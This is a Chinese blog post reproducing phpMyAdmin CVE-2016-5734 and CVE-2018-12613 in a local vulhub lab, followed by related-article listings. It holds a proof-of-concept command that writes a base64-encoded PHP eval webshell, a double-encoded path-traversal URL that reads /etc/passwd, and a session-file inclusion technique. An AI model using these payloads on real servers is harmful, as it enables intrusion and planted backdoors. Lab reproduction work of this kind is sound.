phpmyadmin漏洞分析复现

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量1.2k 收藏 5
点赞数
分类专栏: vulhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43047908/article/details/119799180
版权

目录

前言

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。

环境搭建

这里我们选择使用vulhub搭建docker进行漏洞复现。

首先安装curl和docker

sudo apt install curl
sudo apt install docker.io
docker -v //查看是否安装成功

然后安装python和pip环境(如果没有),命令如下

sudo apt install python
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
sudo python get-pip.py
pip -V //查看是否安装成功

然后再安装docker-compose

pip install docker-compose
docker-compose -v

在这里插入图片描述

到这个地方docker环境就已经搭建好了,这时候需要从github上把vulhub的漏洞环境给clone下来,这里直接clone网不太好,我就直接下载下来了copy到了靶机上

git clone https://github.com/vulhub/vulhub.git

之后进入phpmyadmin的漏洞环境

在这里插入图片描述

这里看到有3个漏洞环境,我们这次目标就是这些漏洞。

漏洞复现

CVE-2016-5734

phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞。

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。

在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。

以下版本受到影响:

  • 4.0.10.16之前4.0.x版本
  • 4.4.15.7之前4.4.x版本
  • 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,所以无法复现本漏洞)
docker-compose up -d

启动,访问http://192.168.50.113:8080/index.php即可进入默认首页。

在这里插入图片描述
这个漏洞需要登录,且能够写入数据
弱口令爆破出来root:root用户名密码,登录。

因为目标环境使用root,所以我们可以创建一个临时数据库和数据表,进行漏洞利用。这里,我们使用POC https://www.exploit-db.com/exploits/40185/ 来复现漏洞。

没有指定表名,这个POC会创建一个名为prgpwn的表
在这里插入图片描述
-d是已经可以写的数据库,-c是待执行的PHP语句

写入一句话

ython3 ./phpmyadmin_poc.py -c "file_put_contents('shell1.php',base64_decode('PD9waHAgZXZhbChAJF9QT1NUWydhJ10pOyA/Pg=='));" -u root -p root -d test http://192.168.50.113:8080/

在这里插入图片描述
成功拿下webshell。

CVE-2018-12613

phpmyadmin 4.8.1 远程文件包含漏洞

其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

环境启动后,访问http://192.168.50.113:8080,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。

在这里插入图片描述

http://192.168.50.113:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

访问上述url发现返回密码信息。

在这里插入图片描述

可见/etc/passwd被读取,说明文件包含漏洞存在。

利用方式也比较简单,可以执行一下SELECT ‘<?=phpinfo()?>’;,然后查看自己的sessionid(cookie中phpMyAdmin的值),然后包含session文件即可:

在这里插入图片描述

她总是阴雨天
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpMyAdmin漏洞利用与安全防范
02-25
很多公司和个人都喜欢使用phpMyAdmin来管理MySQL数据库——在zoomeye中搜索关键字phpmyadmin,我国位居第二,如下图1所示。phpMyAdmin功能非常强大,可以执行命令,导入或者导出数据库,可以说通过phpMyAdmin可以完全操控Mysql数据库。但是,如果存在设置的Root密码过于简单,代码泄露Mysql配置等漏洞,通过一些技术手段,99%都能获取网站webshell,有的甚至是服务器权限。phpMyAdmin在一些流行架构中大量使用,例如phpStudy、phpnow、Wammp、Lamp、Xamp等,这些架构的默认密码为root,如果未修改密码,极易被渗透。p
漏洞复现-phpmyadmin_SQL注入 (CVE-2020-5504)
qq_58683895的博客
10-27 744
phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。路径:/pma/index.php 密码root:123456。证明有东西,应该就是首页,那网站的路径即为/var/www/html/pma。
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 1067
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpmyadmin弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1342
phpmyadmin弱口令至getshell 漏洞复现
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 565
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 3万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
phpMyAdmin 4.8.1 本地文件包含漏洞复现
weixin_51681694的博客
04-22 479
漏洞点在根目录下的index.php中的61行target传参可任意控制,控制index.php包含任意文件上面的if条件需要满足target且为且且中黑名单:查看最后一个条件,需要返回true第一个红框定义白名单第二个红框检查文件名是否在白名单中,在则返回true第三个红框将原传入字符串从0到?前分割出来,再检查字符串是否在白名单中,在则返回true可以考虑设置字符串内容?之前的字符串为白名单,绕过过滤,可是?不能出现在文件名中最后则是利用点。
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 2787
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
(CVE-2016-5734)PHP反序列化漏洞复现
weixin_52777165的博客
01-05 755
漏洞简介 Phpmyadmin是一个以php为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可以使用Web接口管理MySQL数据库。借由次Web接口可以成为一个简单方式输入SQL语法的较佳途径。其优势就是可以通过Web界面来远程管理方便建立、修改、删除数据库及资料表 影响版本 Phpmyadmin -> 4.0.10.16之前的4.0.x版本 4.4.15.7 之前的 4.4.x版本 4.6.3之前的 4.6.x版本 Php版本: 4.3.0 ~5.4.6 Php
phpMyAdmin通过密码漏洞留后门文件
10-17
今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞留后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
phpMyAdmin v4.8.5
10-04
phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
phpmyadin CVE-2016-5734漏洞复现
qq_46804551的博客
04-09 197
搭建 漏洞复现 下载利用脚本: https://www.exploit-db.com/exploits/40185 脚本利用方法: -u 账号 -p 密码 -c 执行代码(php代码) 默认执行uname -a python 40185.py -u root -p root http://192.168.154.3:8080 成功读取到文件 接下来写入木马 python .\CVE-2016-57.py -u root --pwd="root" http://192.168.1.101:8080
fedora mysql 漏洞修复_phpMyAdmin 4.8.5 发布,修复任意文件读取和SQL注入漏洞
weixin_42524004的博客
01-19 696
phpMyAdmin 4.8.5 已经发布,phpMyAdmin是一个用PHP编写的免费软件工具,用于处理MySQL或MariaDB数据库服务器的管理。您可以使用phpMyAdmin执行大多数管理任务,包括创建数据库,运行查询和添加用户帐户。phpMyAdmin 4.8.5以修复两个严重的安全漏洞。安全漏洞如下:CVE-2019-6799:任意文件读取漏洞在4.8.5之前的phpMyAdmin中发...
EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
omnispace的博客
05-30 621
Vulnerability CreditYuki Chen of Qihoo 360 Vulcan TeamZhiniang Peng of Qihoo 360 Core SecurityVulnerability DescriptionWe found and successfully exploit a buffer out-of-bounds write vulnerability in E...
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
weixin_55821558的博客
04-26 750
环境:php 5.5.30 工具:phpstudy(小皮面板) 这个漏洞是源于phpmyadmin中的index.php,下面是源码: 以上进行一下分析: 1.传入的target不能为空 2.必须是一个字符串 3.不能以index开头 4.不能再数组target_blacklist中 5.且经过checkPageValidit检查后为真 首先前三个都很好理解 我们先看一下第四个 黑名单为: 在index.php中,已经事先定义了target_blacklist的值,即import.php和ex
关于phpMyAdmin默认安装漏洞的学习笔记
Mi1k7ea
03-01 5981
简单地说,phpMyAdmin是安装在Web服务器上的接口界面,主要用于使用php来管理安装在服务器上的后台数据库。在老的版本中,若管理员没有对相应配置信息进行处理的话就会导致漏洞的存在。在dvwa中phpMyAdmin的默认安装中会存在漏洞,用户可以在路径中不需要输入账号密码就可以直接访问其中的phpMyAdmin/setup目录: http://10.10.10.137/phpMyAdmin
[vulhub]_phpmyadmin_4.8.1_远程文件包含(cve-2018-12613)复现&RCE实现
fightte的博客
06-05 597
[网络安全任重道远] ~ 题目有点长 ~ 是这样的。这是vulhub的复现,算是第一个接触的vulhub吧,FFFLLLAAAGGG ~ vulhub ----- 是一个漏洞集成平台,依赖于docker,可以方便的复现漏洞,github上有 phpmyadmin ----- 是网页版的数据库管理工具, CVE编号是 ----- CVE-2018-12613, 其漏洞有 ----- 文件包含和远程命令执行, ~ 过程 漏洞具体原因可参考: https://www.cnblogs.com/leixiao-/p/
PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)
hclimg的博客
10-30 2298
phpmyadmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞复现环境:基于某平台的在线靶场进行漏洞复现 复现过程: 1. 访问网址,是一处phpmyadmin的登录地址首页,通过弱密码可以进入数据库管理界面 2. 根据在网上曝光的CVE-2018-1...
phpmyadmin漏洞
07-27
引用\[1\]:根据网上公开的phpMyadmin文件包含漏洞,通过代码审计定位危险函数,然后逐步分析,最终确定payload,并通过本地搭建phpMyadminV4.8.1版本成功进行漏洞复现。实际上该漏洞对于大部分版本的phpMyadmin都生效,因此有使用该系统的需要引起格外的重视,及时修补该漏洞。\[1\]引用\[2\]:文件包含漏洞是指在程序中动态引用了用户可控制的文件,而没有对用户输入进行充分的过滤和验证,导致攻击者可以通过构造恶意的文件路径来读取、执行或者包含任意文件。\[2\]引用\[3\]:在phpMyadmin的大部分版本中都存在文件包含漏洞。\[3\] 问题: phpmyadmin漏洞是什么? 回答: phpMyadmin漏洞是指在phpMyadmin程序中存在的文件包含漏洞。该漏洞允许攻击者通过构造恶意的文件路径来读取、执行或者包含任意文件。这个漏洞对于大部分版本的phpMyadmin都生效,因此使用该系统的用户需要格外重视,并及时修补该漏洞。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *2* *3* [phpmyadminV4.8.1本地文件包含漏洞复现](https://blog.csdn.net/weixin_64551911/article/details/125609281)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值